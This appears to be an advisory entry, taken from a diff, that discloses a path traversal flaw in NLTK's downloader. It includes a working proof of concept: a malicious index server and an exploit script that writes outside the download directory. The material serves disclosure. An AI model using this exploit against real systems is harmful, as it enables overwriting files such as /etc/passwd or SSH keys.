+ "details": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n ↓\n2. Provides malicious XML: <package id=\"passwd\" subdir=\"../../etc\" .../>\n ↓\n3. Victim executes: downloader.download('passwd')\n ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n ↓\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"<?xml version=\"1.0\"?>\n<nltk_data>\n <packages>\n <package id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n url=\"http://127.0.0.1:8888/test.zip\" \n size=\"100\" unzipped_size=\"100\" unzip=\"0\"/>\n </packages>\n</nltk_data>\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/malicious_index.xml':\n self.send_response(200)\n self.send_header('Content-type', 'application/xml')\n self.end_headers()\n with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n self.wfile.write(f.read())\n elif self.path == '/test.zip':\n self.send_response(200)\n self.send_header('Content-type', 'application/zip')\n self.end_headers()\n with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n print(f\"✗ Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```",
0 commit comments